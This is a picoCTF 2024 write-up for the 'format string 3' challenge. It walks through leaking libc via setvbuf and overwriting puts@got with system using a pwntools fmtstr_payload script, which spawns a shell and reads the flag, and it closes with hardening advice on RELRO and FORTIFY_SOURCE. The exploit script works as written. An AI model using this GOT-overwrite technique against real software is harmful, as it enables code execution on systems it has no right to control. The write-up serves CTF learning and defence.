format string 3 picoCTF 2024 Solution

Published: April 3, 2024

Description

Can you overwrite a GOT entry through a format string vulnerability and pop a shell?

Download the binary, source (format-string-3.c), and the matching libc.so.6.

Verify protections: NX is on, PIE is off (the binary's GOT is at a fixed address). ASLR randomizes libc per run.

Install pwntools.

bash
wget https://artifacts.picoctf.net/c/518/format-string-3
bash
wget https://artifacts.picoctf.net/c/518/format-string-3.c
bash
wget https://artifacts.picoctf.net/c/518/libc.so.6
bash
chmod +x format-string-3
bash
checksec --file=./format-string-3
bash
pip install pwntools

Solution

Want to try it yourself first?

The guided walkthrough reveals hints one step at a time.

Walk me through it
  1. Step 1
    Read the source: there is no win function
    Observation
    I noticed the challenge binary shipped with source (format-string-3.c) and that no win() or get_shell() symbol appeared in 'checksec' output or objdump, which suggested the solution required redirecting an existing libc call rather than jumping to a planted helper.
    The vulnerability is the classic printf(buf) on user input. The binary leaks &setvbuf so you can compute the libc base. There is no win(); you need to redirect an existing function call to system(). The puts(normal_string) at the end of main, where normal_string is the global "/bin/sh", is the obvious target.
    bash
    cat format-string-3.c
    Learn more

    Why puts("/bin/sh") is the gift. The author left a global string normal_string = "/bin/sh" and a final puts(normal_string) call. If you can change what puts does, that final line becomes system("/bin/sh") and you have a shell. Changing what puts does means overwriting its GOT entry.

    The Global Offset Table (GOT). Dynamically-linked binaries call libc functions through a GOT entry: call puts in the binary actually does jmp [puts@got.plt], where puts@got.plt is a writable pointer that the dynamic linker fills in at first use. Overwrite that pointer to point at system and every subsequent puts call becomes a system call.

    What you have to leak. The GOT entry for puts lives in the binary at a fixed address (PIE is off; 0x404018 in this build). system lives in libc at a random address (ASLR is on). The challenge binary leaks &setvbuf for free, and inside any one libc image the offset between setvbuf and system is constant. So libc_base = leaked_setvbuf - libc.symbols['setvbuf'], then system_addr = libc_base + libc.symbols['system']. See ASLR / PIE bypass for CTF for the wider pattern.

  2. Step 2
    Find the format-string offset and the GOT target
    Observation
    I noticed the vulnerable printf(buf) call uses user-supplied input directly as the format string, and that the input buffer lands on the stack; I needed the exact positional index (the 'offset') so that fmtstr_payload would target the correct stack slot when building the write payload.
    Run the binary with input AAAAAAAA.%1$p.%2$p.%3$p...%40$p and find the index whose value is 0x4141414141414141. That's the format-string offset to your buffer; for this build it's 38.
    python
    python3 -c "print('AAAAAAAA' + '.'.join(f'%{i}\$p' for i in range(1, 41)))" | nc rhea.picoctf.net <PORT_FROM_INSTANCE>
    bash
    # Look in the output for 0x4141414141414141 - the slot index N before that is your offset
    bash
    # Confirm: echo -n 'AAAAAAAA%38\$p' | ./format-string-3   should print 0x4141414141414141
    What didn't work first

    Tried: Assume the offset is 38 without verifying and go straight to building the payload.

    The offset 38 is build-specific. A recompile, different glibc, or different optimization flags shifts the buffer's stack position and produces a different slot index. If the offset is wrong, fmtstr_payload emits writes targeting garbage addresses, the binary usually segfaults, and you never get a shell. Always derive the offset empirically against the exact binary provided.

    Tried: Use %p without a positional index (just chaining bare %p.%p.%p...) to find the offset.

    Bare %p increments printf's internal argument pointer sequentially, so the Nth %p reads slot N. This technically works to see the values, but the count you measure is 1-based from RSI (slot 1), meaning you still have to track which output position corresponds to which slot. Using %1$p through %40$p with explicit indices makes the mapping unambiguous and avoids miscounting when any output value is 0x0 (which bare %p also prints).

    Learn more

    Why 38 specifically. The 1024-byte buf sits on the stack inside main's frame. printf's nth positional argument starts in registers, then walks up the stack until it finds your buffer. 38 is build-specific; on a slightly different layout (different optimisation, different glibc) it can be 36, 40, or otherwise. Always re-derive with the chain.

    Pwntools FmtStr can automate the offset hunt. If you connect once and feed it a callable, FmtStr binary-searches the offset. For this challenge the manual chain is faster; for messier formats, FmtStr-then-fmtstr_payload is the standard combo.

    Find the GOT entry. readelf -r format-string-3 | grep puts or pwntools' elf.got['puts']. PIE is off, so the address is fixed at runtime.

  3. Step 3
    Build the GOT-overwrite with fmtstr_payload
    Observation
    I noticed the binary leaks &setvbuf before reading input and that PIE is disabled (puts@got is at a fixed address), which meant I could compute system's runtime address from the leak and use fmtstr_payload to overwrite puts@got so the final puts(normal_string) call would become system("/bin/sh").
    Compute libc_base from the leaked setvbuf, then system_addr = libc.symbols['system'] + libc_base, then send fmtstr_payload(38, {elf.got['puts']: system_addr}). When main returns to puts(normal_string), it calls system("/bin/sh") instead.
    python
    python3 - <<'PY'
    from pwn import *
    
    exe = './format-string-3'
    elf = context.binary = ELF(exe)
    libc = ELF('./libc.so.6')
    
    # io = process(exe)              # local testing
    io = remote('rhea.picoctf.net', 0)  # replace 0 with <PORT_FROM_INSTANCE>
    
    # 1. Eat the leak
    io.recvuntil(b'setvbuf in libc: ')
    setvbuf_leaked = int(io.recvline().strip(), 16)
    libc.address = setvbuf_leaked - libc.symbols['setvbuf']
    log.info(f'libc base: {hex(libc.address)}')
    log.info(f'system:    {hex(libc.symbols["system"])}')
    log.info(f'puts@got:  {hex(elf.got["puts"])}')
    
    # 2. Build and send the GOT overwrite
    payload = fmtstr_payload(38, {elf.got['puts']: libc.symbols['system']})
    io.sendline(payload)
    
    # 3. main returns -> puts(normal_string) is now system("/bin/sh")
    io.interactive()
    PY
    bash
    # inside the shell:
    bash
    ls / && cat /flag.txt

    Expected output

    picoCTF{...}
    What didn't work first

    Tried: Use the libc on the local machine instead of the provided libc.so.6 to compute system's offset.

    libc symbol offsets differ between versions - setvbuf and system are at completely different relative distances in Ubuntu 22.04's libc versus 20.04's. Using the wrong libc gives a plausible-looking system_addr that points into garbage memory, the GOT overwrite lands on a non-function address, and puts crashes instead of spawning a shell. Always load the exact libc.so.6 artifact from the challenge download.

    Tried: Overwrite the GOT entry for setvbuf or printf rather than puts.

    setvbuf is called only during setup before your input is read, so overwriting it has no effect after that point. printf is the vulnerable function itself - corrupting its GOT entry mid-execution can crash before the write completes or produce an infinite loop. puts is the correct target because it is called once, after your format-string payload is processed, with the convenient argument normal_string = "/bin/sh" already in RDI.

    Learn more

    How fmtstr_payload assembles the write. A 64-bit address is 8 bytes. Writing all 8 in one %n requires printing 262 chars, infeasible. Pwntools splits into four %hn (2-byte) writes or eight %hhn (1-byte) writes, sequenced by a series of %c pads that set the running output length to exactly the value you want at each step. The four target addresses are appended at the end of the payload and referenced via the offset you supplied. Format strings for CTF walks the byte-by-byte construction in detail.

    Why this works without a win() function. The technique is called GOT overwrite or GOT poisoning. It promotes any future libc call into a hijack point. puts is the cleanest target here because (a) the binary explicitly calls puts(normal_string) with normal_string = "/bin/sh", and (b) system takes the same single-string-pointer signature. No argument shuffling needed.

    Why ASLR doesn't save the server. ASLR randomizes the libc base on every fork, but the binary leaks &setvbuf from that exact same libc image before reading your input. Subtracting the static libc.symbols['setvbuf'] offset gives you the runtime libc base for this connection. Any other libc symbol (like system) is then a fixed offset away.

    Hardenings that would have killed this. Full RELRO would mark the GOT read-only after dynamic linker setup, breaking the overwrite primitive. FORTIFY_SOURCE with -D_FORTIFY_SOURCE=2 redirects printf to __printf_chk, which refuses format strings containing %n. Either of those is a one-line compile flag. See Buffer overflow exploitation for CTF for the broader hardening table.

Interactive tools
  • pwntools Payload BuilderPack integers into little-endian bytes (p32 / p64), unpack bytes back to integers, and build flat ROP payloads with offset-based insertion.

Flag

Reveal flag

picoCTF{G07_G07?_...}

There is no win() in this binary. The win move is GOT poisoning: leak libc via &setvbuf, compute system, and use fmtstr_payload to point puts@got at system. The trailing puts("/bin/sh") in main becomes system("/bin/sh") and you read /flag.txt from the shell.

Key takeaway

GOT overwrite (or GOT poisoning) redirects execution by corrupting the writable function pointer table that the dynamic linker uses to resolve libc calls. When a binary has no explicit win function, any libc call invoked after your write with attacker-controlled arguments becomes a hijack target; puts('/bin/sh') converting to system('/bin/sh') is the textbook case. Full RELRO closes this class of attack by marking the GOT read-only after startup, and FORTIFY_SOURCE blocks %n in printf, making both compiler flags worth enabling in every production build.

Related reading

Want more picoCTF 2024 writeups?

Tools used in this challenge

Do these first

What to try next